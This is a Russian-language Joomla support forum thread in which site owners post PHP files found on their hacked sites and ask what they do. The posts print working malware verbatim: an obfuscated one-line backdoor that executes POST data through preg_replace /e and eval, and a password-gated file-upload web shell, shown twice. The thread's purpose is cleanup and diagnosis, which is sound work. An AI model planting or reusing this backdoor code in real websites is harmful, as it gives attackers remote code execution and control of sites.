Форум русской поддержки Joomla!® CMS
09.12.2016, 05:55:31 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

Войти
   
   Начало   Поиск Joomla 3.0 FAQ Joomla 2.5 FAQ Joomla 1.5 FAQ Правила форума Новости Joomla Реклама Войти Регистрация Помощь  
Страниц: [1]   Вниз
  Добавить закладку  |  Печать  
Автор

Взломали сайт, что делает код?

 (Прочитано 302 раз)
0 Пользователей и 1 Гость смотрят эту тему.
Леон
Давно я тут
****

Репутация: +4/-0
Offline Offline

Пол: Мужской
Сообщений: 266



« : 16.07.2016, 15:38:32 »

Здравствуйте. Недавно обнаружил на своем сайте один подозрительный php файл, прогнал через ai-bolit, нашел множество файлов с одинаковым кодом (с разными именами), в разных директориях сайта. Что он делает?

1. файл:
Код:
<?php isset($_POST['airq8i']) && ($www= $_POST['airq8i']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');

2. файл:
Код:
<?php isset($_POST['340q10']) && ($www= $_POST['340q10']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');

И все файлы в таком роде.

Я так понял если ему передать пост данные, то что он сделает?
« Последнее редактирование: 16.07.2016, 15:46:47 от Леон » Записан
flyingspook
Moderator
*****

Репутация: +226/-9
Offline Offline

Сообщений: 3537


« Ответ #1 : 16.07.2016, 15:52:14 »

Я так понял если ему передать пост данные, то что он сделает?
Выполнит то что ему указано  Smiley
Записан
Леон
Давно я тут
****

Репутация: +4/-0
Offline Offline

Пол: Мужской
Сообщений: 266



« Ответ #2 : 16.07.2016, 15:59:46 »

Наверное будет еще один файл с основным кодом, а эти порядка 50-ти одинаковых для его запуска?
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 727


Свободен для работы


« Ответ #3 : 16.07.2016, 16:13:10 »

Наверное будет еще один файл с основным кодом, а эти порядка 50-ти одинаковых для его запуска?
Разные только параметры POST, все остальное одинаково
Записан
Леон
Давно я тут
****

Репутация: +4/-0
Offline Offline

Пол: Мужской
Сообщений: 266



« Ответ #4 : 16.07.2016, 16:15:25 »

Нашел еще один файл на сайте, тут уже похоже форма загрузки файлов:
Код:
<?php if(md5($_GET["ms-load"])=="cb8f68e224e682ef7f1b3747f3f749d4"){
$p=$_SERVER["DOCUMENT_ROOT"];
$tyuf=dirname(__FILE__);
echo <<<HTML
<form enctype="multipart/form-data"  method="POST">
Path:$p<br>
<input name="file" type="file"><br>
To:<br>
<input size="48" value="$tyuf/" name="pt" type="text"><br>
<input type="submit" value="Upload">
$tend
HTML;
if (isset($_POST["pt"])){
$uploadfile = $_POST["pt"].$_FILES["file"]["name"];
if ($_POST["pt"]==""){$uploadfile = $_FILES["file"]["name"];}
if (copy($_FILES["file"]["tmp_name"], $uploadfile)){
echo"uploaded:$uploadfilen";
echo"Size:".$_FILES["file"]["size"]."n";
}else {
print "Error:n";
}
}
}
Записан
wishlight
Профи
********

Репутация: +200/-1
Offline Offline

Пол: Мужской
Сообщений: 3491


skype aqaus.com


« Ответ #5 : 16.07.2016, 16:21:55 »

Она самая.
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 727


Свободен для работы


« Ответ #6 : 16.07.2016, 16:32:11 »

Молодец, в верном направлении мыслишь!
Записан
Леон
Давно я тут
****

Репутация: +4/-0
Offline Offline

Пол: Мужской
Сообщений: 266



« Ответ #7 : 19.07.2016, 15:02:05 »

Удалил все подозрительные файлы. Сменил пароли, обновил движок, поставил компонент Securitycheck Pro J3x. Прошло 2 дня, пока все чисто, прогонял еще раз ai-bolit'ом, ничего нового не появилось) Жаль не удалось узнать что именно эти вирусы делали.
Записан
Masha0701
Захожу иногда
**

Репутация: +0/-0
Offline Offline

Сообщений: 14


« Ответ #8 : 01.12.2016, 11:31:03 »

Я так понимаю, это тоже инъекция ?

_______________
<?php if(md5($_GET["ms-load"])=="8e5c6d4f76b8a4c0593846e4aeffc38c"){
$p=$_SERVER["DOCUMENT_ROOT"];
$tyuf=dirname(__FILE__);
echo <<<HTML
<form enctype="multipart/form-data"  method="POST">
Path:$p<br>
<input name="file" type="file"><br>
To:<br>
<input size="48" value="$tyuf/" name="pt" type="text"><br>
<input type="submit" value="Upload">
$tend
HTML;
if (isset($_POST["pt"])){
$uploadfile = $_POST["pt"].$_FILES["file"]["name"];
if ($_POST["pt"]==""){$uploadfile = $_FILES["file"]["name"];}
if (copy($_FILES["file"]["tmp_name"], $uploadfile)){
echo"uploaded:$uploadfilen";
echo"Size:".$_FILES["file"]["size"]."n";
}else {
print "Error:n";
}
}
}
_________________________
Записан
draff
Практически профи
*******

Репутация: +161/-5
Offline Offline

Пол: Мужской
Сообщений: 2659


step by step


« Ответ #9 : 01.12.2016, 11:45:35 »

Похоже - да. А в файле есть проверка на вход через Joomla ?
Код:
// no direct access
defined('_JEXEC') or die('Restricted access');
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 727


Свободен для работы


« Ответ #10 : 01.12.2016, 12:55:21 »

Я так понимаю, это тоже инъекция ?
НЕТ! это называется уплодер))))
Записан
wishlight
Профи
********

Репутация: +200/-1
Offline Offline

Пол: Мужской
Сообщений: 3491


skype aqaus.com


« Ответ #11 : 01.12.2016, 12:58:25 »

Я так понимаю, это тоже инъекция ?

Последствия ее. Лечить и обновлять.
Записан
Страниц: [1]   Вверх
  Добавить закладку  |  Печать  
 
Перейти в:  

Powered by SMF 1.1.21 | SMF © 2006, Simple Machines

Joomlaforum.ru is not affiliated with or endorsed by the Joomla! Project or Open Source Matters.
The Joomla! name and logo is used under a limited license granted by Open Source Matters
the trademark holder in the United States and other countries.

LiveInternet